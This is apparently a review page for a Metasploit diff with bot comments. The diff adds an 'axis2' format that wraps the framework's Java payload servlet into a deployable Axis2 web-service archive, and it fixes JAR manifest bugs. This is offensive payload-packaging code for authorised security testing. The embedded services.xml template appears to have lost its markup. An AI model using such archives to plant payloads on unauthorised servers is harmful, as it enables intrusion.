diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index d61b2190cc..46015019f6 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -107,5 +107,41 @@ module Msf::Payload::Java zip end -end + # + # Used by stagers to create a axis2 webservice file as a {Rex::Zip::Jar}. + # Stagers define a list of class files in @class_files which are pulled + # from the MetasploitPayloads gem. The configuration file is created by + # the payload's #config method. + # + # @option :app_name [String] Name of the Service in services.xml. Defaults to random. + # @return [Rex::Zip::Jar] + def generate_axis2(opts={}) + raise if not respond_to? :config + app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8) + + services_xml = %Q{ +#{Rex::Text.rand_text_alphanumeric(50 + rand(50))} +metasploit.PayloadServlet + + + + +} + + paths = [ + [ 'metasploit', 'Payload.class' ], + [ 'metasploit', 'PayloadServlet.class' ] + ] + @class_files + + zip = Rex::Zip::Jar.new + zip.add_file('META-INF/', '') + zip.add_file('META-INF/services.xml', services_xml) + zip.add_files(paths, MetasploitPayloads.path('java')) + zip.add_file('metasploit.dat', config) + zip.build_manifest(:app_name => app_name) + + zip + end + +end diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 2879093ba7..07f6256a8a 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb 
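Review bot: The guard at the top of `generate_axis2`, `raise if not respond_to? :config`, re-raises nothing and so surfaces as a RuntimeError with no message, leaving the caller no hint that the payload module lacks `#config`. I would write `raise "#{self.class} does not implement #config" unless respond_to?(:config)`, which keeps the exception class and adds the reason. `] + @class_files` will fail with a TypeError if a stager never set `@class_files`; `] + Array(@class_files)` tolerates that case. The doc comment's tag should follow YARD's form, `# @option opts [String] :app_name Name of the service in services.xml. Defaults to random.`, preceded by `# @param opts [Hash]`, and "a axis2" should read "an Axis2".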
@@ -284,20 +284,26 @@ module Msf payload_module = framework.payloads.create(payload) payload_module.datastore.merge!(datastore) case format - when "raw", "jar" - if payload_module.respond_to? :generate_jar - payload_module.generate_jar.pack - else - payload_module.generate - end - when "war" - if payload_module.respond_to? :generate_war - payload_module.generate_war.pack - else - raise InvalidFormat, "#{payload} is not a Java payload" - end + when "raw", "jar" + if payload_module.respond_to? :generate_jar + payload_module.generate_jar.pack else - raise InvalidFormat, "#{format} is not a valid format for Java payloads" + payload_module.generate + end + when "war" + if payload_module.respond_to? :generate_war + payload_module.generate_war.pack + else + raise InvalidFormat, "#{payload} is not a Java payload" + end + when "axis2" + if payload_module.respond_to? :generate_axis2 + payload_module.generate_axis2.pack + else + raise InvalidFormat, "#{payload} is not a Java payload" + end + else + raise InvalidFormat, "#{format} is not a valid format for Java payloads" end end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 161d85930b..e6446f604c 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -2221,6 +2221,7 @@ require 'msf/core/exe/segment_appender' "asp", "aspx", "aspx-exe", + "axis2", "dll", "elf", "elf-so", diff --git a/lib/rex/zip/jar.rb b/lib/rex/zip/jar.rb index 3fae79ec44..c49054245a 100644 --- a/lib/rex/zip/jar.rb +++ b/lib/rex/zip/jar.rb @@ -47,8 +47,9 @@ class Jar < Archive # def build_manifest(opts={}) main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil) - app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil) + app_name = (opts[:app_name] ? randomize(opts[:app_name]) : nil) existing_manifest = nil + meta_inf_exists = @entries.find_all{|item| item.name == 'META-INF/' }.length > 0 @manifest = "Manifest-Version: 1.0\r\n" @manifest << "Main-Class: #{main_class}\r\n" if main_class 
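Review bot: The new `when "axis2"` branch copies the `war` branch's message, `"#{payload} is not a Java payload"`, although the condition it follows only tests `respond_to? :generate_axis2`. A Java payload module that does not provide that generator would be reported as not being Java at all; `raise InvalidFormat, "#{payload} cannot be generated in axis2 format"` describes the actual failure. The `war` and `axis2` branches are now identical apart from the method name, so a comment above the `case` noting that each archive format requires the matching `generate_*` method would help the next format added. The enclosing method begins outside this hunk.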
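Review bot: `meta_inf_exists` in `build_manifest` is computed with `@entries.find_all{|item| item.name == 'META-INF/' }.length > 0`, which builds an intermediate array only to test whether it is empty; `meta_inf_exists = @entries.any? { |item| item.name == 'META-INF/' }` states the intent directly and stops at the first match. The comparison is an exact string match, so a directory entry stored without the trailing slash or in different case would not be detected and the guarded `add_file("META-INF/", '')` in the following hunk would still add a second entry; a one-line comment such as `# only the canonical 'META-INF/' directory entry is recognised` would make that assumption visible. `build_manifest` continues outside this hunk.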
@@ -69,7 +70,7 @@ class Jar < Archive if existing_manifest existing_manifest.data = @manifest else - add_file("META-INF/", '') + add_file("META-INF/", '') unless meta_inf_exists add_file("META-INF/MANIFEST.MF", @manifest) end end @@ -280,4 +281,3 @@ end end end -